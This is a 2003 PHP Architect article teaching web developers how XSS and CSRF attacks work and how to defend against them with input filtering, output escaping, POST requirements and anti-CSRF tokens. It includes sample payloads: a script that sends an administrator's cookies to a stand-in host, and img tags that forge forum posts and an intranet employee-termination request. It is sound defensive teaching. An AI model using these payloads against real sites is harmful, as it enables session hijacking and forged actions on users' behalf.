Foiling Cross-Site Attacks

Published in PHP Architect on 14 Oct 2003

This article explores two contrasting attack vectors, cross-site scripting (XSS) and cross-site request forgeries (CSRF). As you read this article, I hope you will not only learn some specific strategies for protecting against these specific attacks, but that you will also gain a deeper understanding of web application security principles in general.

Cross-Site Scripting

If you're a web developer, you've most likely heard about XSS. In fact, you may have already taken steps to protect your applications against XSS attacks. The effectiveness of such protective measures depends upon whether you're addressing the root cause of the problem or just a symptom, and of course how well you understand the problem in the first place. It is a common tendency to only address a specific exploit in much the same way that you might resolve a bug using a specific test case. With this strategy, a web developer's effort is less effective. You want to address the root cause of a problem whenever possible.

The fundamental error that yields XSS vulnerabilities is a blind trust of remote data (input). A general recommendation among web developers is to never trust user input, but protecting against XSS requires more, because any input can be dangerous. Examples of include posts on a forum, email displayed in a browser, an advertisement, stock quotes provided in a feed, and form data. For any useful application, there is going to be a lot of input, and this is the type of application that requires the most attention. The risk is not just that you trust the input, but that you assume it is safe to display to your users. You are trusted by your users, and XSS attacks exploit that trust.

To understand why displaying such data can be dangerous, consider a simple registration form where users provide a preferred username along with their email address, and their registration information is emailed to them once their account is created. The following form might be used to solicit this information:

  1. <form action="/register.php" method="POST">
  2. <p>Username: <input type="text" name="username" /></p>
  3. <p>Email: <input type="text" name="email" /></p>
  4. <p><input type="submit" value="Register" /></p>
  5. </form>

Figure 1 illustrates how this form might appear in a browser.

Figure 1:

A Simple Registration Form

If the data sent by this form is not properly filtered, malicious users can send malicious data to register.php, and the only limit to what they can do is the limit of their creativity.

Consider if the registration data is stored in a database as follows:

  1. <?php
  2.  
  3. $mysql = array();
  4. $mysql['username'] = mysql_real_escape_string($_POST['username']);
  5. $mysql['email'] = mysql_real_escape_string($_POST['email']);
  6.  
  7. $sql = "INSERT
  8.         INTO users (username, email)
  9.         VALUES ('{$mysql['username']}', '{$mysql['email']}')";
  10.  
  11. ?>

Hopefully the use of $_POST is conspicuous. Although $_POST['username'] and $_POST['email'] are escaped properly for MySQL, this example still demonstrates a blind trust of this data. With legitimate users, the dangers of this approach will remain hidden, and this is exactly how many web application vulnerabilities are born. Consider the following username:

  1. <script>alert('XSS');</script>

Although it is easy to determine that this is not a valid username, the previous example demonstrates how the code that you write might not be so wise. Without input filtering, anything can end up in the database. Of course, the danger in the case of XSS is when this data is displayed to users.

Assume that this particular registration system has an administrative interface that is only accessible from the local network by authorized users. It is easy to assume that an application inaccessible from the outside is safe, and less effort might be invested in the security of such an application. Now, consider the code in Listing 1 that displays a list of registered users to authorized administrators.

Listing 1:

  1. <table>
  2.     <tr>
  3.         <th>Username</th>
  4.         <th>Email</th>
  5.     </tr>
  6.  
  7. <?php
  8.  
  9. if ($_SESSION['admin']) {
  10.     $sql = 'SELECT username, email
  11.             FROM users';
  12.  
  13.     $result = mysql_query($sql);
  14.  
  15.     while ($record = mysql_fetch_assoc($result)) {
  16.         echo " <tr>\n";
  17.         echo " <td>{$record['username']}</td>\n";
  18.         echo " <td>{$record['email']}</td>\n";
  19.         echo " </tr>\n";
  20.     }
  21. }
  22.  
  23. ?>
  24.  
  25. </table>

If the data in the database is tainted, an administrator might be subjected to XSS by using this application. This risk is illustrated in Figure 2.

Figure 2:

XSS Can Penetrate Firewalls

This risk is even clearer if you consider a more malicious payload such as the following:

  1. <script>
  2. new Image().src =
  3.     'http://example.org/steal.php?cookies=' +
  4.     encodeURI(document.cookie);
  5. </script>

If this is displayed to an administrator, the administrator's cookies will be sent to example.org. In this example, steal.php can access the cookies with $_GET['cookies']. Once captured, these cookies can be used to hijack the administrator's session.

Safeguarding Against XSS

There are a few guidelines that you can follow to help safeguard your applications against XSS attacks. Hopefully you can already predict a few of these.

Filter All Input
You must, without fail, filter all input. Inspect all input, and only allow valid data into your application.
Escape All Output
You should also escape all output. For data that is meant to be displayed as raw data and not interpreted as HTML, it must be escaped for the context of HTML.
Use Mature Solutions
When possible, use mature, existing solutions instead of trying to create your own. Functions like strip_tags() and htmlentities() are good choices.
Only Allow Safe Content
Instead of trying to predict what malicious data you want to reject, define your criteria for valid data, and force all input to abide by your guidelines. For example, if a user is supplying a last name, you might start by only allowing alphabetic characters and spaces, as these are safe. If you reject everything else, Berners-Lee and O'Reilly will be rejected, despite being valid last names. However, this problem is easily resolved. A quick change to also allow single quotes and hyphens is all you need to do. Over time, your input filtering techniques will be perfected.
Use a Naming Convention
There are many naming conventions that you can use to identify whether a particular variable is tainted. Choose whichever convention is most intuitive to you, and use it consistently in all of your development. A simple example is to initialize an array called $clean, and only store data in $clean once it has been filtered.

Cross-Site Request Forgeries

CSRF is an almost opposite type of attack. Rather than exploiting the trust that a user has for a particular site, CSRF exploits the trust that a site has for a particular user. In the case of XSS, the user is the victim. In the case of CSRF, the user is an accomplice.

Because CSRF involves a forged HTTP request, it is important to first understand a little bit about HTTP, the protocol that web clients and servers use to communicate. Web clients (browsers) send HTTP requests to web servers, and the servers return HTTP responses in reply. A request and its corresponding response make up an HTTP transaction. A basic example of an HTTP request is as follows:

  1. GET / HTTP/1.1
  2. Host: example.org

The URL being requested in this example is http://example.org/. Here is a slightly more realistic example of a request for this resource:

  1. GET / HTTP/1.1
  2. Host: example.org
  3. User-Agent: Mozilla/1.4
  4. Accept: text/xml, image/png, image/jpeg, image/gif, */*

This example demonstrates the use of two additional HTTP headers: User-Agent and Accept. The Host header, present in both examples, is required in HTTP/1.1. There are many HTTP headers that may be included in a request, and you might be familiar with referencing some of these in your code. PHP makes these available to you in the $_SERVER array as $_SERVER['HTTP_HOST'], $_SERVER['HTTP_USER_AGENT'], and $_SERVER['HTTP_ACCEPT']. For the remainder of this article, optional headers will be omitted for brevity in the examples.

The simplest example of a CSRF attack uses an <img> tag to initiate the forged request. To explain how this is possible, consider a request for http://example.org/ that prompts the following response:

  1. HTTP/1.1 200 OK
  2. Content-Length: 61
  3.  
  4. <html>
  5. <img src="http://example.org/image.png" />
  6. </html>

When a browser interprets the HTML content, it will send a GET request for each additional resource it needs to render the page. For example, after interpreting this response, an additional request is sent for the image:

  1. GET /image.png HTTP/1.1
  2. Host: example.org

The most important characteristic of this request is that it is identical to a request initiated directly by the user. This is because requests for images are no different than requests for any other URL. A resource is a resource.

Figure 3 illustrates how CSRF can abuse this behavior.

Figure 3:

A CSRF Attack Initiated from an Image

In order to appreciate the risk, consider a simple forum located at http://forum.example.org/ that provides the following form for adding a post:

  1. <form action="/post.php">
  2. <p>Subject: <input type="text" name="subject" /></p>
  3. <p>Message: <textarea name="message"></textarea></p>
  4. <p><input type="submit" value="Add Post" /></p>
  5. </form>

If a user enters foo as the subject and bar as the message, an HTTP request similar to the following will be sent (assuming that the session identifier is propagated as a cookie):

  1. GET /post.php?subject=foo&message=bar HTTP/1.1
  2. Host: forum.example.org
  3. Cookie: PHPSESSID=123456789

Consider the following <img> tag:

  1. <img src="http://forum.example.org/post.php?subject=foo&message=bar" />

When a browser requests this image, the HTTP request will look identical to the previous example, including the PHPSESSID cookie. With a simple change to the URL, an attacker can modify the subject and message to be anything, even XSS. All the attacker must do to launch the attack is have the victim(s) visit a URL that contains this image, and the victim's browser will do the rest, all behind the scenes. The victim will likely be completely unaware of the attack.

More dangerous attacks might forge requests to purchase items or perform administrative tasks on a restricted intranet application. Consider an application located at http://192.168.0.1/admin/ that allows authorized users to terminate employees. Even with a flawless session management mechanism that is immune to impersonation, combined with the fact that this application cannot be accessed by users outside of the local network, a CSRF attack can avoid these safeguards with something as simple as the following:

  1. <img src="http://192.168.0.1/admin/terminate_employee.php?employee_id=123" />

Figure 4 illustrates this particular attack and how it can be used to penetrate an otherwise secure local network.

Figure 4:

CSRF Can Penetrate Firewalls

The most challenging characteristic of CSRF is that a legitimate user is sending the request. Also, because it is unrealistic to rely on other web sites to disallow <img> tags, especially since the attacker could coerce the victim into visiting the attacker's own site, the problem must be addressed upon receipt. Preventing forged requests is unrealistic. Detecting them is essential.

Safeguarding Against CSRF

Safeguarding your applications against CSRF is a bit more challenging than safeguarding them against XSS attacks, but there are a few guidelines that you can follow.

Use POST
Although it doesn't prevent CSRF, you should require POST for any request that performs an action. This also means using $_POST instead of $_REQUEST.
Require Verification
Although convenience is a hallmark of good design, if a single request can trigger an important action, the risk of CSRF is increased. For important actions, don't hesitate to ask the user for verification. For extremely sensitive actions, consider requiring the user to provide a password in order to authorize the action.
Use an Anti-CSRF Token
The root cause of CSRF is a failure to verify intent. In order to help verify intent, consider adding an anti-CSRF token to your forms. Consider Listing 2 as a substitute for the form used to post to forum.example.org. When a user requests this form, a new token is generated, saved in the user's session, and included in the form as a hidden form variable. Therefore, when a request is received by post.php, not only can $_POST['token'] be compared with $_SESSION['token'], but a timeout can also be applied to further minimize the risk. This tactic practically eliminates CSRF.

Listing 2:

  1. <?php
  2.  
  3. $token = md5(uniqid(rand(), TRUE));
  4. $_SESSION['token'] = $token;
  5. $_SESSION['token_timestamp'] = time();
  6.  
  7. ?>
  8.  
  9. <form action="/post.php" method="POST">
  10. <input type="hidden" name="token" value="<?php echo $token; ?>" />
  11. <p>Subject: <input type="text" name="subject" /></p>
  12. <p>Message: <textarea name="message"></textarea></p>
  13. <p><input type="submit" value="Add Post" /></p>
  14. </form>

Summary

I hope you now have a solid understanding of both XSS and CSRF. The key to web application security is to make life easy for the good guys and difficult for the bad guys. No application is completely secure, so try to focus on making attacks as difficult as possible.

Every obstacle helps.